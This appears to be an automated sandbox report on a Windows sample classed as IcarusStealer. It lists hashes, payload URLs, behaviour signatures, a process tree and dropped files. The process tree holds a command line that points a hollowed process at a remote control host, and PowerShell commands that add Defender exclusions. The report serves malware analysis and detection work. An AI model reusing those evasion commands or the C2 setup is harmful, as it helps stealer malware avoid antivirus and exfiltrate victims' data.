Overview

overview

10

Static

static

3

Lol.exe

windows7-x64

10

Lol.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08/03/2024, 20:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Lol.exe

  • Size

    494KB

  • MD5

    c0e9809fcc4b0347e9257a16d71eeecb

  • SHA1

    45dd5e7f29e2939de5fb6bd7efe1cf59b6170dd7

  • SHA256

    723eff54d04dabd806c06190b582ccaba96836d923ce2d49fef537ba3568669a

  • SHA512

    a24ee93e7978f5075fed12c04e1100e94123df5f11c7e4e81821ac929a411e0a39b86248d1fb6bd89e09cb8835351cd2e06911041aea1c8ba34c75d274a21ba6

  • SSDEEP

    12288:uX4axuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qq:uX5/6N6LqQzJqkd

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lol.exe
    "C:\Users\Admin\AppData\Local\Temp\Lol.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hylhgso0\hylhgso0.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES255C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDC6D8061E3744D31B2C7C51C165B61B4.TMP"
        3⤵
          PID:2544
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          3⤵
            PID:2828
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client should-nutritional.gl.at.ply.gg 22817 PUGlcQLxe
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2456
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1612
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2560
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2408
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2660
          • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
            C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2792

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RES255C.tmp
        Filesize

        1KB

        MD5

        02a2c20a12668d1e02818a538531baf6

        SHA1

        bb3d70370299d5f8dd645a04432b9112ee37f346

        SHA256

        fbfd7ef08db5341c6530aa25fd1c36f8654fae5763a33856d4c148c7e9c8bce1

        SHA512

        d2609f2ad2ccec024d4bbbf5bd7f35f8617e7c05693bd14eebf6dafcceecb93872df1ee6a4eedf16610a05ae64da5301cdeb763d18cfd8079be9aa8027c97ca3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
        Filesize

        4KB

        MD5

        62d8c5c0cd96d8c04e90c85a8a428101

        SHA1

        5fbe149191aa532abb93c2046a42701f8c58dae4

        SHA256

        0fc29b26d73df89b3a99e7846a5774f33685bba32f77b18b99052f53795ba8c8

        SHA512

        fb2c2d02c497aa121dd6aecb880be09dc83e470611f2eed91bd2640cfe97d2a2d180be0b77cdaf27f41589ed5144afd25687875b4345aaa0d7560fd930806297

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DRL6692GL0CRUT87L7U4.temp
        Filesize

        7KB

        MD5

        f32896ce3eac43e2e6032ae6bdbeffb2

        SHA1

        adccbcbdbf0106b9d8eb434c3deec89988db6952

        SHA256

        0807782619efb4c55e7ccf5226ad23542d850d791c7958dc12b2324a27a780ec

        SHA512

        25645584e2a23069edbe74f3d40115bbebf5eaff73a7bfe2bee1eb956f22a6d6f871411e937398dfb457b64297fe9ee59a7409a03f9aa507aedb0d4745be0fa5

        Download Submit

      • C:\Users\Admin\AppData\Roaming\temp0923
        Filesize

        10B

        MD5

        d95d8b94c86f2ef698f4d328e80f7e5a

        SHA1

        21b2774d2a18adafa0b3fe00d48499173a9e9a4f

        SHA256

        fedacc2623edabe3a3be2a96543fd78ca0712dffad4258d6e52b9757cb2bcfb5

        SHA512

        e9401fc5e7c3daf0c5474c17f3d5795fc800d676ce34fb854df5f87867ccb0c086e94232d865c73aba9b1995a74aeb2a9aeb9b1053310e6167bdf17ca8b6c7e6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\CSCDC6D8061E3744D31B2C7C51C165B61B4.TMP
        Filesize

        1KB

        MD5

        1d5543c367c49b9dd6366270fdd4ee3a

        SHA1

        bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

        SHA256

        502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

        SHA512

        86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\hylhgso0\hylhgso0.0.cs
        Filesize

        1KB

        MD5

        14846c9faaef9299a1bf17730f20e4e6

        SHA1

        8083da995cfaa0e8e469780e32fcff1747850eb6

        SHA256

        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

        SHA512

        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\hylhgso0\hylhgso0.cmdline
        Filesize

        451B

        MD5

        09d4efbcf6aafd2e3ed25d699e71d048

        SHA1

        b2d19d50aeae475f18f7dfc967d7efa088b9cca0

        SHA256

        dff2c1dd9bed6e2d7f32fd867481fcb828ddabc9f8ec97e08439d7dff777ae59

        SHA512

        9f4b247b3b24775726676a18174460af1a284843edb796745fbe9cf5f840097362246a7b908e554a7f6b9f1dc4819fefd78d14689b8cbfd5c6f9cd8738af095b

        Download Submit

      • memory/1612-45-0x0000000002990000-0x00000000029D0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1612-44-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1612-49-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1612-42-0x0000000002990000-0x00000000029D0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1612-50-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2104-38-0x0000000074BA0000-0x000000007528E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2104-2-0x0000000004E70000-0x0000000004EB0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2104-1-0x0000000074BA0000-0x000000007528E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2104-0-0x0000000000FA0000-0x0000000001022000-memory.dmp

        Filesize

        520KB

        Download

      • memory/2408-47-0x0000000002760000-0x00000000027A0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2408-46-0x0000000002760000-0x00000000027A0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2408-40-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2408-41-0x0000000002760000-0x00000000027A0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2408-51-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2408-43-0x000000006F8B0000-0x000000006FE5B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2628-67-0x0000000002970000-0x0000000002980000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2628-58-0x00000000043F0000-0x00000000043F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2628-53-0x00000000043F0000-0x00000000043F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2640-18-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-19-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2640-15-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-29-0x0000000074BA0000-0x000000007528E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2640-48-0x00000000010C0000-0x0000000001100000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2640-26-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-22-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-20-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-16-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-17-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2640-54-0x0000000074BA0000-0x000000007528E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2640-56-0x00000000010C0000-0x0000000001100000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2792-55-0x000007FEF5F50000-0x000007FEF693C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2792-57-0x000000001AE40000-0x000000001AEC0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2792-39-0x000007FEF5F50000-0x000007FEF693C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2792-52-0x000000001AE40000-0x000000001AEC0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2792-30-0x0000000000B80000-0x0000000000B88000-memory.dmp

        Filesize

        32KB

        Download